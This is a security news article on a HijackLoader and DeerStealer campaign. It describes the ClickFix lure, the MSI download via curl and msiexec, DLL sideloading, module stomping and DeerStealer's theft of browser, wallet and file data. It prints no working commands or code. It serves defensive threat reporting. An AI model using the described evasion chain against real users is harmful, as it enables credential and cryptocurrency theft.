New Malware Duo HijackLoader & DeerStealer Surge: Bypassing Defenses for Data Theft

Recently, eSentire’s Threat Response Unit (TRU) uncovered an alarming surge in campaigns leveraging a malware duo: HijackLoader and DeerStealer. What started with a simple phishing redirect has now evolved into a stealthy, multi-stage infection chain capable of bypassing defenses and exfiltrating a range of personal and enterprise data.

The initial compromise begins with ClickFix, a deceptively simple social engineering trick. Victims are lured to phishing pages that prompt them to copy and paste a malicious command into the Windows Run prompt — a form of malware delivery that bypasses traditional defenses like email filtering and sandboxing.

This command downloads a malicious MSI file (now.msi) via curl.exe, which executes using msiexec.exe. Under the hood, this MSI abuses a legitimate COMODO binary (EngineX_Co64.exe) to sideload a malicious cmdres.dll, cleverly hijacking the DLL loading process.

“Though this file isn’t malicious by itself… it is seen instead loading an unsigned version of cmdres.dll,” the researchers explain.

Once inside, HijackLoader takes over. Originally spotted in 2023, it continues to evolve with advanced tactics like:

• Storing encrypted configuration in PNG images via steganography
• Module stomping to inject payloads into signed binaries
• Dynamic API resolution using custom hashing algorithms

HijackLoader decrypts its second stage from files like Bairrout.xd using hardcoded offsets and cryptographic routines. The loader then module stomps input.dll and launches a renamed Q-Dir binary to host the final payload: DeerStealer.

Marketed by a threat actor known as LuciferXfiles on dark-web forums, DeerStealer is sold as part of a malware suite called XFiles Spyware. Subscriptions range from $200 to $3000/month, with higher tiers offering stealth features like:

• Hidden VNC for remote desktop control
• Advanced keylogging, clipper, and browser data harvesting
• AI integration and upcoming macOS support

“Unique jump-tables/simple virtual machines are used to decrypt the C2 URL and strings used throughout and due to control flow obfuscation understanding these virtual machines is made that much more difficult,” the report details.

Its core functionality includes:

• Harvesting data from 800+ browser extensions, desktop wallets, VPNs, gaming clients, email apps, and RDP clients
• Hijacking the clipboard to replace crypto-wallet addresses with attacker-controlled ones
• Deploying a modular File Grabber to exfiltrate sensitive documents based on preset rules

DeerStealer communicates with its C2 via HTTPS, using a proxy system (“Gasket”) to mask true server IPs. Initial check-ins fingerprint the host using Windows install date/time, GUIDs, and CPU name. Encrypted ZIP files are used for data exfiltration.

What makes this campaign especially dangerous is its defense evasion at every step:

• Run Prompt execution bypasses email-based security
• LOLBin (Living Off the Land Binary) abuse with curl.exe and msiexec.exe
• Signed binary sideloading of COMODO’s EngineX_Co64.exe
• Module stomping for stealth execution
• AI-resistant obfuscation that defeats many static analysis engines

Despite the public availability of HijackLoader extractors, threat actors show no signs of adapting, suggesting either negligence or confidence in remaining undetected.

Related Posts:

• HijackLoader Evolves: New Modules Bring Stealth, Persistence, and Advanced VM Evasion
• Beware of Fake Google Meet Invites: ClickFix Campaign Spreading Infostealers
• ClickFix: The Rising Threat of Clipboard-Based Social Engineering
• State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
• Lazarus APT Targets Job Seekers with “Contagious Interview” Campaign Using ClickFix Technique